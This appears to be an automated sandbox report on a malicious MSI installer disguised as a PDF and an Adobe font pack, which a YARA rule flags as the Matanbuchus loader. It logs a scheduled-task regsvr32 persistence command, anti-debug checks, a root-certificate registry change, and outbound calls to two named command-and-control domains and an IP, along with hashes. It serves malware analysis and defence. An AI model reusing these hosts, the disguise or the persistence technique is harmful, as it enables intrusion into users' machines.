Binary or memory string: zyjF6yeosi3Z3BbszxHZ5k7PONzRIIxJBPMbNo3u0Vg2zQeMu4Rk8CfGv3TUFN4O

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 23_2_6DADACAD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA99910 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA99910 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA99910 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9E160 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9E160 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9E160 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9E160 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA96570 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA968E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA98300 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA95580 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA95580 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA95580 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA95580 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA95580 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAD89F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAA1160 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9ECD0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9ECD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9ECD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAD8C50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAD8C50 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAA0BEE mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADEFD5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA91300 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA91300 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DAE2B7D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9DF70 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DA9AAC0 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADACAD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADD490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 23_2_6DADAF5D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 213.226.114.15 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: telemetrysystemcollection.com

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 23_2_6DADAACC cpuid

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 23_2_6DADEC61 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	11 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Scripting	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	34 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	11 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	11 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	11 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Regsvr32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SCAN-068589.pdf.msi	2%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\AdobeFontPack\main.dll	5%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
telemetrysystemcollection.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe
https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx	0%	Avira URL Cloud	safe
http://collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php	0%	Avira URL Cloud	safe
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx	0%	Avira URL Cloud	safe
http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
telemetrysystemcollection.com	213.226.114.15	true	true	1%, Virustotal, Browse	unknown
collectiontelemetrysystem.com	213.226.114.15	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	true	Avira URL Cloud: safe	unknown
http://collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php	true	Avira URL Cloud: safe	unknown
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown
https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown
http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx	regsvr32.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.226.114.15	telemetrysystemcollection.com	Russian Federation		9002	RETN-ASEU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	647225
Start date and time: 16/06/202220:29:35	2022-06-16 20:29:35 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SCAN-068589.pdf.msi
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.evad.winMSI@11/22@70/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 11.3% (good quality ratio 11.1%) Quality average: 84.5% Quality standard deviation: 16.7%
HCA Information:	Successful, ratio: 58% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .msi Adjust boot time Enable AMSI Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:30:49	API Interceptor	86x Sleep call for process: regsvr32.exe modified
20:31:43	Task Scheduler	Run new task: 5507 path: %windir%\system32\regsvr32.exe s>-n -i:"Updateheck" "C:\Users\user\AppData\Local\x86\5507.nls"

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	8790
Entropy (8bit):	5.540766519267191
Encrypted:	false
SSDEEP:	96:1W3AmeeQ6RSQUpgeGCsvRqEHUpgeGC6jDk6svRqE7HHYOLNLopcwGPGPzxC2pTBK:1W32eOpgeVi0pgeVdr92pg
MD5:	5FBE23119C9F5808D49FB5422A8F377C
SHA1:	52C9DEA2990B4732CE359CD42E08F73A1C91F7E3
SHA-256:	D59707F487CD063F6A05F961F7EFC5DBB6194F9ED22CE593763D307534218E6F
SHA-512:	F4F56B9B8BE038606F12A2B44353BEF8E3C899509342A0692A1E7B1743D429269F7B0C1816D658C679B977E2C5C557DB724279D4E57E2111808C109065EB59F4
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@..T.@.....@.....@.....@.....@.....@......&.{CC038BA5-7236-4713-8948-DFF082243638}..Adobe Font Pack 3.0.12.9..SCAN-068589.pdf.msi.@.....@.....@.....@........&.{717A1233-ED34-40D0-B14C-98BF5C0B90FE}.....@.....@.....@.....@.......@.....@.....@.......@......Adobe Font Pack 3.0.12.9......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}&.{CC038BA5-7236-4713-8948-DFF082243638}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..+.C:\Users\user\AppData\Local\AdobeFontPack\....3.C:\Users\user\AppData\Local\AdobeFontPack\main.dll....5.C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@......Software\AdobeFontPack...@....(.&...AdobeFontPack..1....RegisterProduct..Registering product..[1]......C:\Windows\Installer\6ecb59.msi.

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Windows\System32\wscript.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: regsvr32.exe	String found in binary or memory: http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe	String found in binary or memory: http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe	String found in binary or memory: https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe	String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe	String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	410624
Entropy (8bit):	5.922447446405698
Encrypted:	false
SSDEEP:	6144:2tugFAmTHh/rONOBHtnee6fIhO1MMwWPzRRTuxeLaRRZMuspQ1fg3U5:wtWmTBpHtee6IcUWbHI/RRZMux
MD5:	95159F5427C976D28C86AA716799E6DE
SHA1:	4BFBF8C48F17A7C7269DFC314E5E5BD166DB857F
SHA-256:	F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E
SHA-512:	04AF830CECD7EC8BF5D2F637A0E52036800D171F8D74F837648BD2129F8D19385FA46AE39C4CB0FC47C03AAA32D17F8739661D8B57B0D3D74532DE29FC20F629
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Local\x86\5507.nls, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..j0f.90f.90f.9$..8:f.9$..8.f.9$..8"f.9b..8.f.9b..8?f.9b..8%f.9$..8!f.90f.9Sf.9h..85f.9h..81f.9h..81f.9Rich0f.9........PE..L....'.a.........."!.................................................................J....@..........................)..x....)...............................`..8...l...T...............................@...............d............................text.............................. ..`.rdata...q.......r..................@..@.data........@....... ..............@....reloc..8....`.......*..............@..B.rsrc................>..............@..@................................................................................................................................................................................................................................................................................................................

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Font Pack 3.0.12.9, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Font Pack, Template: Intel;1033, Revision Number: {717A1233-ED34-40D0-B14C-98BF5C0B90FE}, Create Time/Date: Thu Jun 16 10:54:52 2022, Last Saved Time/Date: Thu Jun 16 10:54:52 2022, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Entropy (8bit):	7.611236658195378
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	SCAN-068589.pdf.msi
File size:	229376
MD5:	c0ee31bc6536ae8cb7e5d8809676920a
SHA1:	b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256:	2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
SHA512:	66ed8f4762f3cb7b4026c9d7eeaec2ee4e8275495d527f99fd163d0a72f436ef2e2fdad88f7dcad87e3dd10c7afffe7b2f0f6c3412de68c16e96f9377cb4fe1d
SSDEEP:	3072:58Xa2c1oag7+aqKVIma2OGwFLOAL4/QUPL8gHtHdNMxOzXNcO2nB:L9oa1aq9oOGwFVL4/QUDDNHdOxOzd0n
TLSH:	4C24124A33144934C11267382FABF7E647317CCD9E5B8A622297F32C2EB35A056635F4
File Content Preview:	........................>......................................................................................................................................................................................................................................

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:	-2146762495
Not Before, Not After	5/17/2022 5:00:00 PM 5/11/2023 4:59:59 PM
Subject Chain	CN="Westeast Tech Consulting, Corp.", O="Westeast Tech Consulting, Corp.", L=NORTHRIDGE, S=California, C=US, SERIALNUMBER=4088386, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	0E4E3D01B136D4F9120A1333A90F111F
Thumbprint SHA-1:	2A40875C895B648C9583925C7DAD694A2A11D7DD
Thumbprint SHA-256:	9ED703BA7033AF5F88A5F5EF0155ADC41715D3175EEC836822A09A93D56E4B7F
Serial:	061A27A3A3771BB440FC16CADF2675C4

Has Summary Info:
Application Name:	Windows Installer XML Toolset (3.11.2.4516)
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Code Page:	1252
Title:	Installation Database
Subject:	Adobe Font Pack 3.0.12.9
Author:	Adobe Inc.
Keywords:	Installer
Comments:	Adobe Font Pack
Template:	Intel;1033
Revion Number:	{717A1233-ED34-40D0-B14C-98BF5C0B90FE}
Create Time:	2022-06-16 09:54:52
Last Saved Time:	2022-06-16 09:54:52
Number of Pages:	200
Number of Words:	10
Creating Application:	Windows Installer XML Toolset (3.11.2.4516)
Security:	2

General
Stream Path:	\x5DigitalSignature
File Type:	data
Stream Size:	4773
Entropy:	7.599019489885285
Base64 Encoded:	True
Data ASCII:	0 . . . * H . . . . . 0 . . . . 1 . 0 . . . ` H . e . . . . . . 0 w . . + . . . . 7 . . . i 0 g 0 2 . . + . . . . 7 . . . 0 $ . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . 0 1 0 . . . ` H . e . . . . . . . } . . . 8 Y 4 , 5 . i 4 . . S . ] . 0 . 0 . . . . . . . . @ ` . L ^ . 0 . . . * H . . . . . . 0 b 1 . 0 . . . U . . . . U S 1 . 0 . . . U . . . . D i g i C e r t I n c 1 . 0 . . . U . . . . w w w . d i g i c e r t . c o m 1 ! 0 . . . U . . . . D i g i C e r t T r u s t e d R
Data Raw:	30 82 12 a1 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 12 92 30 82 12 8e 02 01 01 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 77 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 69 30 67 30 32 06 0a 2b 06 01 04 01 82 37 02 01 1e 30 24 02 01 02 04 10 f1 10 0c 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 01 00 02 01 00 02 01 00 02 01 00 02 01 00 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01

General
Stream Path:	\x5MsiDigitalSignatureEx
File Type:	data
Stream Size:	32
Entropy:	4.726409765557392
Base64 Encoded:	False
Data ASCII:	N o ) . z : ^ M . ] . . F
Data Raw:	4e 6f 29 ae 97 9b ef ad bd 7a ae df 3a b5 83 5e 4d 9b b8 d2 85 5d 17 01 bb ac f7 b7 ae 46 8c 97

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	476
Entropy:	4.498978990647221
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l a t i o n D a t a b a s e . . . . . . . . . . . A d o b e F o n t P a c k 3 . 0 . 1 2 . 9 . . . . . . . . . . . . A d o b e I n c . . . . . . . . . . . I n s
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 c4 00 00 00 05 00 00 00 d8 00 00 00 06 00 00 00 ec 00 00 00 07 00 00 00 04 01 00 00 09 00 00 00 18 01 00 00 0c 00 00 00 48 01 00 00

General
Stream Path:	\x16944\x17191\x14436\x16830\x16740
File Type:	Microsoft Cabinet archive data, 185058 bytes, 2 files
Stream Size:	185058
Entropy:	7.998106767695454
Base64 Encoded:	True
Data ASCII:	M S C F . . . . . . . . . . , . . . . . . . . . . . . . . . . . . . ` . . . . . . . . D . . . . . . . . T ' o . m a i n _ d l l . D . . . . D . . . . T 8 M . n o t i f y _ v b s . & J . 8 . C K \| . \\ U . z K . , Z n . h e . . + . + 3 . S @ $ . ) . g p . [ . m l F . . . * . Q . ^ . . . \| . . . < . 9 _ u y i . + . . . . W K t 6 k e ; - . . . . ; o y g N s b L l 3 . ~ h \| 9 n . i . R = \\ . . ; x X . 5 ~ r . . . e . h . ~ k Q . \\ V . ] \\ & = 3 5 W s O . . . . n . ~ x m . w = * w L 4 N # 2 { \\ = Q < \\ _ N O
